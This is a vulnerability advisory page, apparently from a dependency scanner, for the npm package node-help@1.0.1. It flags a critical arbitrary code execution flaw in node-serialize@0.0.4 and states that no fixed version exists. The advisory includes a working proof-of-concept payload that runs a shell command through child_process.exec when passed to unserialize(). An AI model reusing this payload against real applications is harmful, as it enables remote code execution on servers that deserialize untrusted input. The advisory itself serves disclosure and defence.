node-help@1.0.1

Vulnerabilities

1 via 1 paths

Dependencies

2

Source

npm

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0

critical severity

Arbitrary Code Execution

  • Vulnerable module: node-serialize
  • Introduced through: node-serialize@0.0.4

Detailed paths

  • Introduced through: node-help@1.0.1 node-serialize@0.0.4

Overview

node-serialize serializes an object and it's function into a JSON.

Affected versions of this package are vulnerable to Arbitrary Code Execution when untrusted user-input is passed into the unserialize() function.

Example:

var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);

Remediation

There is no fix version for node-serialize

References